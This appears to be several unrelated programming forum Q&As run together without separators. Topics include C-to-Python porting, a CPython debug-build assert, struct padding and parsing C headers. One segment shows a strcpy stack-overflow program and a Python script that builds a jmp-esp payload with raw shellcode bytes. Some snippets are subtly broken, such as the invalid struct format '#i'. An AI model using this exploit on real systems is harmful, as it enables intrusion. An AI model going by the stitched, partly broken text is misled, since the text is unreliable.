I'm trying to rewrite some C code in Python, but I'm not sure how to express this part in Python:
#include <EEPROM.h>
#define EEPROM_write(address, p) {int i = 0; byte *pp = (byte*)&(p);for(; i < sizeof(p); i++) EEPROM.write(address+i, pp[i]);}
I think I should use the I2C object from the machine module, but I'm not sure what is going on in the C version.
Let's dissect the macro line:
#define
This is the preprocessor command to define a macro.
EEPROM_write(address, p)
The macro is named "EEPROM_write" and it takes two arguments, "address" and "p". Since the preprocessor essentially works as a search-and-replace mechanism here, there are no types; they depend on the site where the macro is used.
{
int i = 0;
byte *pp = (byte*)&(p);
for (; i < sizeof(p); i++)
EEPROM.write(address+i, pp[i]);
}
This is the formatted C code of the replacement. It consists of a single block of statements, and the preprocessor will replace each occurrence of address and p with the arguments given at the usage of the macro.
The code block takes the address of p as a byte pointer. Then it loops through all bytes of p (including padding) and calls EEPROM.write() with consecutive addresses (starting at address) and the respective byte of p.
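A rough Python equivalent (a sketch, not taken from the question): serialize the value to its raw bytes with struct.pack and write them to consecutive addresses. The write_byte function below is a hypothetical placeholder for whatever your EEPROM driver exposes; for an external I2C EEPROM on MicroPython you would typically build it on top of machine.I2C.writeto_mem.

import struct

def eeprom_write(write_byte, address, value, fmt='<i'):
    # Pack the value into its raw bytes; fmt must match the C type of p
    # ('<i' = little-endian 32-bit int, '<f' = 32-bit float, and so on).
    raw = struct.pack(fmt, value)
    # Write each byte to a consecutive address, like the C for loop.
    for i, b in enumerate(raw):
        write_byte(address + i, b)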
testing on ../../test/test_patm.py
python: Python/compile.c:4420: int assemble_lnotab(struct assembler *,
struct instr *): Assertion `d_lineno >= 0' failed.
Aborted
When running my test programs I got the error shown above.
Eventually I found that it came down to just a small difference between the sources of Python 3.5 and Python 3.6.
Just one line:
Python 3.5
static int
assemble_lnotab(struct assembler *a, struct instr *i)
{
int d_bytecode, d_lineno;
Py_ssize_t len;
unsigned char *lnotab;
d_bytecode = a->a_offset - a->a_lineno_off;
d_lineno = i->i_lineno - a->a_lineno;
assert(d_bytecode >= 0);
assert(d_lineno >= 0); // the only difference
if(d_bytecode == 0 && d_lineno == 0)
return 1;
...
Python 3.6
static int
assemble_lnotab(struct assembler *a, struct instr *i)
{
int d_bytecode, d_lineno;
Py_ssize_t len;
unsigned char *lnotab;
d_bytecode = (a->a_offset - a->a_lineno_off) * sizeof(_Py_CODEUNIT);
d_lineno = i->i_lineno - a->a_lineno;
assert(d_bytecode >= 0);
if(d_bytecode == 0 && d_lineno == 0)
return 1;
What if I just deleted assert(d_lineno >= 0);?
You're using a debug build of 3.5. In Python 3.5 and any previous version, the line numbering within a single bytecode block (i.e. the bytecode of a module, or of a function) had to be monotonic, that is, each opcode had to map to a line in the source code whose line number was greater than or equal to the line number of the previous opcode. This was only ever checked in debug builds; in release builds of Python the assert would not be compiled in, but the generated line number table would have been invalid anyway.
This was discussed in Issue 26107 on bugs.python.org. The requirement that line numbers be monotonic was seen as detrimental to optimizations, many of which reorder the generated bytecode. Thus the check was removed in 3.6, along with other changes that make the line number delta a signed integer.
You can comment out this assert pretty safely, as release builds would have eliminated it anyhow, but don't expect debugging to work correctly in the generated code, since the line number table is then invalid.
As an alternative, if you're reorganizing lines in the AST, or something similar, you can set all line numbers to 0 - not just the missing ones; or you can generate fake line numbers that don't break the monotonicity rule.
A coincidental problem occurs with generated ASTs, as ast.fix_missing_locations would write a line number of 0 to any nodes that lacked line numbering. If parts of the AST contain line numbers because they originated from ast.parse, it is likely that the resulting AST tree will break the monotonicity requirement - which, again, only leads to problems on non-release builds of Python < 3.6.
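For example, a minimal sketch of the second workaround: give a generated node the location of a neighbouring statement before calling fix_missing_locations, so line numbers stay monotonic even on debug builds of Python < 3.6.

import ast

tree = ast.parse("x = 1\nprint(x)\n")
# A statement built by hand (e.g. by an AST transformation); it has no
# location information yet.
extra = ast.AugAssign(target=ast.Name(id="x", ctx=ast.Store()),
                      op=ast.Add(),
                      value=ast.Num(n=1))
# Borrow the location of the statement it will follow, then let
# fix_missing_locations fill in the children from their parents.
ast.copy_location(extra, tree.body[0])
tree.body.insert(1, extra)
ast.fix_missing_locations(tree)
exec(compile(tree, "<generated>", "exec"))   # prints 2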
The other change, which is not relevant to the bug here, is the change from bytecode to wordcode, also introduced in Python 3.6. There each opcode is a 16-bit word instead of an 8-bit byte with possible extended args. That's the reason the offset is multiplied by sizeof(_Py_CODEUNIT).
Say I have the following code in C++:
union {
int32_t i;
uint32_t ui;
};
i = SomeFunc();
std::string test(std::to_string(ui));
std::ofstream outFile(test);
And say I had the value of i somehow in Python, how would I be able to get the name of the file?
For those of you who are unfamiliar with C++: what I am doing here is writing some value in signed 32-bit integer format to i and then interpreting the bitwise representation as an unsigned 32-bit integer in ui. I am taking the same 32 bits and interpreting them in two different ways.
How can I do this in Python? There does not seem to be any explicit type specification in Python, so how can I reinterpret some set of bits in a different way?
EDIT: I am using Python 2.7.12
I would use the Python struct module for interpreting bits in different ways.
Something like the following prints -12 as an unsigned integer:
import struct
p = struct.pack("#i", -12)
print("{}".format(struct.unpack("#I",p)[0]))
I'm trying to write my own exploit. The idea is simple: overwrite the return address with the address of a place where there is a 'jmp esp' opcode. ESP holds the address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[100];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
return 0;
}
My exploit is written in Python. Code: (I think my shellcode does not work, but that is not important now.)
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68\x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
If I set the address of the 'jmp esp' opcode to 0x41414141 (AAAA), everything is OK (of course 0x41414141 is not a valid address, but I can see that the memory has been overwritten).
My problem starts when I put in the correct address. I found 0x7769E24D, so I used this value, and afterwards in OllyDbg I saw:
And this is my question: why does the memory look different? It looks as if one line has been removed. But why? The interesting thing is that if I change only one byte (0x77 to 0x41), the memory is overwritten with the correct value.
The second problem is that some of my bytes are transformed into different values - for example 0x8b to 0x3f.
Could somebody tell me why this happens? Maybe this is a kind of protection? Is it something to do with my operating system? I use Windows 8.1 x64.
Is there a way in Python to unpack C structures created using #pragma pack(x) or __attribute__((packed)) with the struct module?
Alternatively, how can I determine how Python's struct module handles padding?
Use the struct module.
It is flexible in terms of byte order (big vs. little endian) and alignment (packing). See Byte Order, Size, and Alignment. It defaults to native byte order and alignment (pretty much meaning however Python was compiled).
Native example
C:
struct foo {
int bar;
char t;
char x;
}
Python:
struct.pack('IBB', bar, t, x)
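To address the padding part of the question: the first character of the format string controls alignment. With no prefix, struct uses native alignment and can insert padding the way the compiler does; with '=', '<' or '>' it uses standard sizes and no padding, which matches a fully packed struct. A small sketch illustrating the difference:

import struct

# char followed by int: native alignment typically inserts 3 padding bytes
print(struct.calcsize('BI'))    # usually 8 on x86/x86-64
# '=' (or '<'/'>') disables padding, like #pragma pack(1) / __attribute__((packed))
print(struct.calcsize('=BI'))   # 5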
I often have to write code in other languages that interact with C structs. Most typically this involves writing Python code with the struct or ctypes modules.
So I'll have a .h file full of struct definitions, and I have to manually read through them and duplicate those definitions in my Python code. This is time-consuming and error-prone, and it's difficult to keep the two definitions in sync when they change frequently.
Is there some tool or library in any language (doesn't have to be C or Python) which can take a .h file and produce a structured list of its structs and their fields? I'd love to be able to write a script that automatically generates my struct definitions in Python, and I don't want to have to process arbitrary C code to do it. Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
If you compile your C code with debugging (-g), pahole (git) can give you the exact structure layouts being used.
$ pahole /bin/dd
…
struct option {
const char * name; /* 0 8 */
int has_arg; /* 8 4 */
/* XXX 4 bytes hole, try to pack */
int * flag; /* 16 8 */
int val; /* 24 4 */
/* size: 32, cachelines: 1, members: 4 */
/* sum members: 24, holes: 1, sum holes: 4 */
/* padding: 4 */
/* last cacheline: 32 bytes */
};
…
This should be quite a lot nicer to parse than straight C.
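For instance, a rough sketch (the regular expression only targets the member lines in the format shown above) that pulls each member's name, offset and size out of pahole's output:

import re
import subprocess

# Matches member lines such as:  int has_arg; /* 8 4 */
member_re = re.compile(r'^\s*(.+?)\s+(\w+)(\[\d+\])?;\s*/\*\s*(\d+)\s+(\d+)\s*\*/')

def pahole_members(binary):
    # The binary must have been built with -g for pahole to see the layouts.
    out = subprocess.check_output(['pahole', binary]).decode()
    for line in out.splitlines():
        m = member_re.match(line)
        if m:
            yield m.group(2), int(m.group(4)), int(m.group(5))   # name, offset, size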
Regular expressions would work great about 90% of the time and then cause endless headaches for the remaining 10%.
The headaches happen in the cases where the C code contains syntax that you didn't think of when writing your regular expressions. Then you go back and realise that C can't really be parsed by regular expressions, and life stops being fun.
Try turning it around: define your own simple format, which allows fewer tricks than C does, and generate both the C header file and the Python interface code from your file:
define socketopts
int16 port
int32 ipv4address
int32 flags
Then you can easily write some Python to convert this to:
typedef struct {
short port;
int ipv4address;
int flags;
} socketopts;
and also to emit a Python class which uses struct to pack/unpack three values (possibly two of them big-endian and the other native-endian, up to you).
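A minimal sketch of such a generator (the type table and format characters are just one possible mapping, little-endian here):

# Map the custom field types to a C type and a struct format character.
TYPES = {'int16': ('short', 'h'), 'int32': ('int', 'i')}

def generate(definition):
    lines = definition.strip().splitlines()
    name = lines[0].split()[1]                 # "define socketopts" -> "socketopts"
    fields = [line.split() for line in lines[1:]]
    c_fields = '\n'.join('    %s %s;' % (TYPES[t][0], f) for t, f in fields)
    c_header = 'typedef struct {\n%s\n} %s;\n' % (c_fields, name)
    fmt = '<' + ''.join(TYPES[t][1] for t, f in fields)   # e.g. '<hii'
    return c_header, fmt

The returned format string can then be used by the generated Python class with struct.pack and struct.unpack.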
Have a look at Swig or SIP, which will generate interface code for you, or use ctypes.
Have you looked at Swig?
I have quite successfully used GCCXML on fairly large projects. You get an XML representation of the C code (including structures) which you can post-process with some simple Python.
ctypes-codegen or ctypeslib (same thing, I think) will generate ctypes Structure definitions (also other things, I believe, but I only tried structs) by parsing header files using GCCXML. It's no longer supported, but will likely work in some cases.
A friend of mine wrote a C parser for this task, which he uses with cog.